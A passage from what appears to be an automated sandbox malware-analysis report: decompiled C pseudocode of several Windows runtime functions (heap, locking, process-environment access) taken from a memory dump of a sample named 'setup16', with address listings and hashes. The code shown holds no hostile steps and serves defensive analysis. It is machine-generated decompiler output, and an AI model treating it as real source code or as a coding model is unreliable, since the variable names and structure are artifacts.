				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x4abd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E049CCC50(_t86);
					L11:
					return E04A0B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x4ab8504
				E049E2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E04A0FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E04A0B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L049E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E049CCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x4ab8504
								E049DFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E049F4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                                                                                                                                                        0x049f4bad
                                                                                                                                                                                                        0x049f4bbf
                                                                                                                                                                                                        0x049f4bc2
                                                                                                                                                                                                        0x049f4bc6
                                                                                                                                                                                                        0x049f4bcd
                                                                                                                                                                                                        0x049f4bd9
                                                                                                                                                                                                        0x04a367fe
                                                                                                                                                                                                        0x04a36800
                                                                                                                                                                                                        0x049f4ccc
                                                                                                                                                                                                        0x049f4ccd
                                                                                                                                                                                                        0x049f4cb7
                                                                                                                                                                                                        0x049f4cc9
                                                                                                                                                                                                        0x049f4cc9
                                                                                                                                                                                                        0x049f4bdf
                                                                                                                                                                                                        0x049f4be5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f4beb
                                                                                                                                                                                                        0x049f4bef
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f4bf5
                                                                                                                                                                                                        0x049f4bf9
                                                                                                                                                                                                        0x049f4c06
                                                                                                                                                                                                        0x049f4c0b
                                                                                                                                                                                                        0x049f4c17
                                                                                                                                                                                                        0x049f4c1c
                                                                                                                                                                                                        0x049f4c1f
                                                                                                                                                                                                        0x049f4c25
                                                                                                                                                                                                        0x049f4c33
                                                                                                                                                                                                        0x049f4c3d
                                                                                                                                                                                                        0x049f4c40
                                                                                                                                                                                                        0x049f4c43
                                                                                                                                                                                                        0x049f4c47
                                                                                                                                                                                                        0x049f4c4d
                                                                                                                                                                                                        0x049f4c53
                                                                                                                                                                                                        0x049f4c54
                                                                                                                                                                                                        0x049f4c55
                                                                                                                                                                                                        0x049f4c56
                                                                                                                                                                                                        0x049f4c5b
                                                                                                                                                                                                        0x049f4c5c
                                                                                                                                                                                                        0x049f4c63
                                                                                                                                                                                                        0x049f4c6b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a36776
                                                                                                                                                                                                        0x04a36784
                                                                                                                                                                                                        0x04a36784
                                                                                                                                                                                                        0x04a3679f
                                                                                                                                                                                                        0x04a367a7
                                                                                                                                                                                                        0x04a367af
                                                                                                                                                                                                        0x04a367ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a367b1
                                                                                                                                                                                                        0x04a367b7
                                                                                                                                                                                                        0x04a367b8
                                                                                                                                                                                                        0x04a367c1
                                                                                                                                                                                                        0x04a367d3
                                                                                                                                                                                                        0x04a367d9
                                                                                                                                                                                                        0x04a367dd
                                                                                                                                                                                                        0x049f4c94
                                                                                                                                                                                                        0x049f4c94
                                                                                                                                                                                                        0x049f4c98
                                                                                                                                                                                                        0x049f4c9c
                                                                                                                                                                                                        0x049f4ca3
                                                                                                                                                                                                        0x04a367f4
                                                                                                                                                                                                        0x04a367f4
                                                                                                                                                                                                        0x049f4cb5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f4cb5
                                                                                                                                                                                                        0x049f4c79
                                                                                                                                                                                                        0x049f4c7e
                                                                                                                                                                                                        0x049f4c89
                                                                                                                                                                                                        0x049f4c8b
                                                                                                                                                                                                        0x049f4c8f
                                                                                                                                                                                                        0x049f4c8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f4c89
                                                                                                                                                                                                        0x04a367c3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a367c3
                                                                                                                                                                                                        0x04a367af
                                                                                                                                                                                                        0x049f4c73
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: d22993d2a3ea891f7423e685c054c3f90cb84a0676715ad23b87735bae4d7a42
                                                                                                                                                                                                        • Instruction ID: 1541990e30d8fc6436cb66f0f2b80262766c83c295890bb82470b6d2759b513e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d22993d2a3ea891f7423e685c054c3f90cb84a0676715ad23b87735bae4d7a42
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E641A375A40228ABDB31DF64CD40BEA77B8EF45700F4145B5EA08AB241EB74FE84CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049D8A0A Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E049D8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x4abd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E04A0B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E049DE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x49a1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E049F1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04A03C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E049D8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                                                                                                                                                        0x049d8a0a
                                                                                                                                                                                                        0x049d8a1c
                                                                                                                                                                                                        0x049d8a23
                                                                                                                                                                                                        0x049d8a2e
                                                                                                                                                                                                        0x049d8a30
                                                                                                                                                                                                        0x049d8a36
                                                                                                                                                                                                        0x049d8a3c
                                                                                                                                                                                                        0x049d8a3e
                                                                                                                                                                                                        0x049d8a4a
                                                                                                                                                                                                        0x049d8a52
                                                                                                                                                                                                        0x049d8a9c
                                                                                                                                                                                                        0x049d8aae
                                                                                                                                                                                                        0x049d8a58
                                                                                                                                                                                                        0x049d8a5e
                                                                                                                                                                                                        0x049d8a6a
                                                                                                                                                                                                        0x049d8a6f
                                                                                                                                                                                                        0x049d8a75
                                                                                                                                                                                                        0x049d8a7d
                                                                                                                                                                                                        0x049d8a85
                                                                                                                                                                                                        0x049d8a86
                                                                                                                                                                                                        0x049d8a89
                                                                                                                                                                                                        0x049d8a93
                                                                                                                                                                                                        0x049d8a99
                                                                                                                                                                                                        0x049d8a9b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8aaf
                                                                                                                                                                                                        0x049d8abe
                                                                                                                                                                                                        0x049d8ac3
                                                                                                                                                                                                        0x049d8acb
                                                                                                                                                                                                        0x049d8ad7
                                                                                                                                                                                                        0x049d8ae0
                                                                                                                                                                                                        0x049d8af1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8af1
                                                                                                                                                                                                        0x049d8acd
                                                                                                                                                                                                        0x049d8ad5
                                                                                                                                                                                                        0x049d8afb
                                                                                                                                                                                                        0x049d8afd
                                                                                                                                                                                                        0x049d8aff
                                                                                                                                                                                                        0x049d8b07
                                                                                                                                                                                                        0x049d8b22
                                                                                                                                                                                                        0x049d8b24
                                                                                                                                                                                                        0x049d8b2a
                                                                                                                                                                                                        0x049d8b2e
                                                                                                                                                                                                        0x049d8b3f
                                                                                                                                                                                                        0x049d8b78
                                                                                                                                                                                                        0x049d8b41
                                                                                                                                                                                                        0x049d8b52
                                                                                                                                                                                                        0x049d8b54
                                                                                                                                                                                                        0x049d8b5c
                                                                                                                                                                                                        0x049d8b74
                                                                                                                                                                                                        0x049d8b74
                                                                                                                                                                                                        0x049d8b5c
                                                                                                                                                                                                        0x049d8b3f
                                                                                                                                                                                                        0x049d8b5e
                                                                                                                                                                                                        0x049d8b61
                                                                                                                                                                                                        0x049d8b64
                                                                                                                                                                                                        0x049d8b64
                                                                                                                                                                                                        0x049d8b6c
                                                                                                                                                                                                        0x049d8b6c
                                                                                                                                                                                                        0x049d8b11
                                                                                                                                                                                                        0x04a29cd5
                                                                                                                                                                                                        0x04a29cd5
                                                                                                                                                                                                        0x049d8b17
                                                                                                                                                                                                        0x049d8b1a
                                                                                                                                                                                                        0x049d8b1a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8ad5
                                                                                                                                                                                                        0x049d8a89

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 8a168e96a61b0062cba9b065790d3aef31259d1a1c323db7ae8921d2d717ac40
                                                                                                                                                                                                        • Instruction ID: 3a46ec0622cd60d27cc8040ba32df75b38b3a675efd7df2dda47817820aab3c6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a168e96a61b0062cba9b065790d3aef31259d1a1c323db7ae8921d2d717ac40
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 314153B4A003289FDB24EF55DC88AA9B7B9EF54300F1085F9D81997252E774AE80CF50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A8FDE2 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E04A8FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E04A8FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E04A90A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E049E7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E04A81608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E04A92B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E04A8C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E04A8DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E049E7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E04A8A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                                                                                                                                                                        0x04a8fde7
                                                                                                                                                                                                        0x04a8fde8
                                                                                                                                                                                                        0x04a8fdec
                                                                                                                                                                                                        0x04a8fdee
                                                                                                                                                                                                        0x04a8fdf5
                                                                                                                                                                                                        0x04a8fdf7
                                                                                                                                                                                                        0x04a8fdfc
                                                                                                                                                                                                        0x04a8fe19
                                                                                                                                                                                                        0x04a8fe22
                                                                                                                                                                                                        0x04a8fe26
                                                                                                                                                                                                        0x04a8fec6
                                                                                                                                                                                                        0x04a8fecd
                                                                                                                                                                                                        0x04a8fed5
                                                                                                                                                                                                        0x04a8fee7
                                                                                                                                                                                                        0x04a8fed7
                                                                                                                                                                                                        0x04a8fee0
                                                                                                                                                                                                        0x04a8fee0
                                                                                                                                                                                                        0x04a8feef
                                                                                                                                                                                                        0x04a8ff00
                                                                                                                                                                                                        0x04a8ff02
                                                                                                                                                                                                        0x04a8ff07
                                                                                                                                                                                                        0x04a8ff07
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8feef
                                                                                                                                                                                                        0x04a8fe33
                                                                                                                                                                                                        0x04a8fe55
                                                                                                                                                                                                        0x04a8fe59
                                                                                                                                                                                                        0x04a8fe5b
                                                                                                                                                                                                        0x04a8fe5e
                                                                                                                                                                                                        0x04a8fe69
                                                                                                                                                                                                        0x04a8fe6d
                                                                                                                                                                                                        0x04a8fe6d
                                                                                                                                                                                                        0x04a8fe69
                                                                                                                                                                                                        0x04a8fe35
                                                                                                                                                                                                        0x04a8fe41
                                                                                                                                                                                                        0x04a8fe41
                                                                                                                                                                                                        0x04a8fe79
                                                                                                                                                                                                        0x04a8fe8b
                                                                                                                                                                                                        0x04a8fe7b
                                                                                                                                                                                                        0x04a8fe84
                                                                                                                                                                                                        0x04a8fe84
                                                                                                                                                                                                        0x04a8fe93
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8fea8
                                                                                                                                                                                                        0x04a8feba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8feba
                                                                                                                                                                                                        0x04a8fdfe
                                                                                                                                                                                                        0x04a8fe01
                                                                                                                                                                                                        0x04a8fe02
                                                                                                                                                                                                        0x04a8fe08
                                                                                                                                                                                                        0x04a8ff0c
                                                                                                                                                                                                        0x04a8ff14
                                                                                                                                                                                                        0x04a8ff14

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                                                                                                                        • Instruction ID: b5ac84683a357f7739c702c60a4ff70230753a4d4b03eac94c9aa03cfaad95e0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C831E332700645AFE722AB68C944F6ABBE9EBC5650F18446DF446CB782DB74FC41C720
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A8EA55 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E04A8EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E049E2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E04A8E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E049CF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E049DFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E04A8AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E04A8BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E049E7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E04A7FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E049DFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E04A8A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                                                                                                                                                                        0x04a8ea55
                                                                                                                                                                                                        0x04a8ea66
                                                                                                                                                                                                        0x04a8ea68
                                                                                                                                                                                                        0x04a8ea6c
                                                                                                                                                                                                        0x04a8ea6f
                                                                                                                                                                                                        0x04a8ea72
                                                                                                                                                                                                        0x04a8ea75
                                                                                                                                                                                                        0x04a8ea7a
                                                                                                                                                                                                        0x04a8ea7a
                                                                                                                                                                                                        0x04a8ea7e
                                                                                                                                                                                                        0x04a8ea80
                                                                                                                                                                                                        0x04a8ea85
                                                                                                                                                                                                        0x04a8ea8b
                                                                                                                                                                                                        0x04a8eab5
                                                                                                                                                                                                        0x04a8eabc
                                                                                                                                                                                                        0x04a8eabf
                                                                                                                                                                                                        0x04a8eabf
                                                                                                                                                                                                        0x04a8eaca
                                                                                                                                                                                                        0x04a8eace
                                                                                                                                                                                                        0x04a8ead0
                                                                                                                                                                                                        0x04a8eae4
                                                                                                                                                                                                        0x04a8eaeb
                                                                                                                                                                                                        0x04a8eaf0
                                                                                                                                                                                                        0x04a8eaf5
                                                                                                                                                                                                        0x04a8eb09
                                                                                                                                                                                                        0x04a8eb0d
                                                                                                                                                                                                        0x04a8eb1d
                                                                                                                                                                                                        0x04a8eb2d
                                                                                                                                                                                                        0x04a8eb38
                                                                                                                                                                                                        0x04a8eb3d
                                                                                                                                                                                                        0x04a8eb41
                                                                                                                                                                                                        0x04a8eb4a
                                                                                                                                                                                                        0x04a8eb60
                                                                                                                                                                                                        0x04a8eb4c
                                                                                                                                                                                                        0x04a8eb52
                                                                                                                                                                                                        0x04a8eb59
                                                                                                                                                                                                        0x04a8eb59
                                                                                                                                                                                                        0x04a8eb68
                                                                                                                                                                                                        0x04a8eb71
                                                                                                                                                                                                        0x04a8eb71
                                                                                                                                                                                                        0x04a8ea8d
                                                                                                                                                                                                        0x04a8ea8f
                                                                                                                                                                                                        0x04a8ea92
                                                                                                                                                                                                        0x04a8ea97
                                                                                                                                                                                                        0x04a8ea97
                                                                                                                                                                                                        0x04a8ea9b
                                                                                                                                                                                                        0x04a8ea9c
                                                                                                                                                                                                        0x04a8ea9e
                                                                                                                                                                                                        0x04a8eaa6
                                                                                                                                                                                                        0x04a8eaa6
                                                                                                                                                                                                        0x04a8eb7e

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                                                                                                                        • Instruction ID: bbb1217e51a11d99ee90114e8e4450253e5f6afdad7c969db12906fb5b35bf0d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4731C172604705ABD719EF24CC84A6BB7AAFBC4714F04892DF55287644EB30F805CBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A469A6 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 69%
                                                                                                                                                                                                        			E04A469A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x4abd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L049D6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04A46BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04A09980() >= 0) {
							E049E2280(_t56, 0x4ab8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x4ab8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x4ab8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E049CB6F0(0x49ac338, 0x49ac288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04A09520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E04A095D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E049DFFB0(_t68, _t77, 0x4ab8778);
				}
				_pop(_t78);
				return E04A0B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                                                                                                                                                        0x04a469b5
                                                                                                                                                                                                        0x04a469be
                                                                                                                                                                                                        0x04a469c3
                                                                                                                                                                                                        0x04a469c9
                                                                                                                                                                                                        0x04a469cc
                                                                                                                                                                                                        0x04a469d1
                                                                                                                                                                                                        0x04a469d3
                                                                                                                                                                                                        0x04a469de
                                                                                                                                                                                                        0x04a469e1
                                                                                                                                                                                                        0x04a469ea
                                                                                                                                                                                                        0x04a469f6
                                                                                                                                                                                                        0x04a469fe
                                                                                                                                                                                                        0x04a46a13
                                                                                                                                                                                                        0x04a46a14
                                                                                                                                                                                                        0x04a46a15
                                                                                                                                                                                                        0x04a46a16
                                                                                                                                                                                                        0x04a46a1e
                                                                                                                                                                                                        0x04a46a26
                                                                                                                                                                                                        0x04a46a31
                                                                                                                                                                                                        0x04a46a36
                                                                                                                                                                                                        0x04a46a37
                                                                                                                                                                                                        0x04a46a40
                                                                                                                                                                                                        0x04a46a49
                                                                                                                                                                                                        0x04a46a4a
                                                                                                                                                                                                        0x04a46a53
                                                                                                                                                                                                        0x04a46a59
                                                                                                                                                                                                        0x04a46a5d
                                                                                                                                                                                                        0x04a46a5e
                                                                                                                                                                                                        0x04a46a64
                                                                                                                                                                                                        0x04a46a67
                                                                                                                                                                                                        0x04a46a6a
                                                                                                                                                                                                        0x04a46a6d
                                                                                                                                                                                                        0x04a46a70
